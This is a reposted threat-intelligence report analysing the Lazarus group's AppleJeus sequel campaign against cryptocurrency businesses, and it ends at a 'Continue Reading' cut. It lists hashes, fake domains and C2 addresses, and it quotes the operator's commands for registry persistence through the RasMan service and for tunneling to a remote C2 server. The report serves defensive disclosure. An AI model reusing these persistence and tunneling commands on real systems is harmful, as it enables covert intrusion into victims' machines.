Operation AppleJeus Sequel

[harlan4096]

Lazarus continues to attack the cryptocurrency business with enhanced capabilities

The Lazarus group is currently one of the most active and prolific APT actors. In 2018, Kaspersky published a report on one of their campaigns, named Operation AppleJeus. Notably, this operation marked the first time Lazarus had targeted macOS users, with the group inventing a fake company in order to deliver their manipulated application and exploit the high level of trust among potential victims. As a result of our ongoing efforts, we identified significant changes to the group’s attack methodology. To attack macOS users, the Lazarus group has developed homemade macOS malware, and added an authentication mechanism to deliver the next stage payload very carefully, as well as loading the next-stage payload without touching the disk. In addition, to attack Windows users, they have elaborated a multi-stage infection procedure, and significantly changed the final payload. We assess that the Lazarus group has been more careful in its attacks following the release of Operation AppleJeus and they have employed a number of methods to avoid being detected.

For more information, please contact: intelreports@kaspersky.com

Life after Operation AppleJeus

After releasing Operation AppleJeus, the Lazarus group continued to use a similar modus operandi in order to compromise cryptocurrency businesses. We found more macOS malware similar to that used in the original Operation AppleJeus case. This macOS malware used public source code in order to build crafted macOS installers. The malware authors used QtBitcoinTrader developed by Centrabit.

These three macOS installers use a similar post installer script in order to implant a mach-o payload, as well as using the same command-line argument when executing the fetched second-stage payload. However, they have started changing their macOS malware. We recognized a different type of macOS malware, MarkMakingBot.dmg (be37637d8f6c1fbe7f3ffc702afdfe1d), created on 2019-03-12. It doesn’t have an encryption/decryption routine for network communication. We speculate that this is an intermediate stage in significant changes to their macOS malware.

Change of Windows malware

During our ongoing tracking of this campaign, we found that one victim was compromised by Windows AppleJeus malware in March 2019. Unfortunately, we couldn’t identify the initial installer, but we established that the infection started from a malicious file named WFCUpdater.exe. At that time, the actor used a fake website: wfcwallet[.]com

The actor used a multi-stage infection like before, but the method was different. The infection started from .NET malware, disguised as a WFC wallet updater (a9e960948fdac81579d3b752e49aceda). Upon execution, this .NET executable checks whether the command line argument is “/Embedding” or not. This malware is responsible for decrypting the WFC.cfg file in the same folder with a hardcoded 20-byte XOR key (82 d7 ae 9b 36 7d fc ee 41 65 8f fa 74 cd 2c 62 b7 59 f5 62). This mimics the wallet updater connected to the C2 addresses:

* wfcwallet.com (resolved ip: 108.174.195.134)
* www.chainfun365.com (resolved ip: 23.254.217.53)

After that, it carries out the malware operator’s commands in order to install the next stage permanent payload. The actor delivered two more files into the victim’s system folder: rasext.dll and msctfp.dat. They used the RasMan (Remote Access Connection Manager) Windows service to register the next payload with a persistence mechanism. After fundamental reconnaissance, the malware operator implanted the delivered payload by manually using the following commands:

* cmd.exe /c dir rasext.dll
* cmd.exe /c dir msctfp.dat
* cmd.exe /c tasklist /svc | findstr RasMan
* cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\RasMan\ThirdParty /v DllName /d rasext.dll /f

In order to establish remote tunneling, the actor delivered more tools, executing with command-line parameters. Unfortunately, we have had no chance to obtain this file, but we speculate that Device.exe is responsible for opening port 6378, and the CenterUpdater.exe tool was used for creating tunneling to a remote host. Note that the 104.168.167.16 server is used as a C2 server. The fake website hosting server for the UnionCryptoTrader case will be described next.

* Port opener:
%APPDATA%\Lenovo\devicecenter\Device.exe 6378

* Tunneling tool:
%APPDATA%\Lenovo\devicecenter\CenterUpdater.exe 127.0.0.1 6378 104.168.167.16 443

Change of macOS malware

JMTTrading case

While tracking this campaign, we identified more heavily deformed macOS malware. At the time, the attacker called their fake website and application JMTTrading. Other researchers and security vendors found it too, and published IoCs with abundant technical details. Malware Hunter Team tweeted about this malicious application, Vitali Kremez published a blog about the Windows version of the malware, and Object-See published details about the macOS malware. We believe these reports are sufficient to understand the technical side. Here, we would like to highlight what’s different about this attack.
...

Continue Reading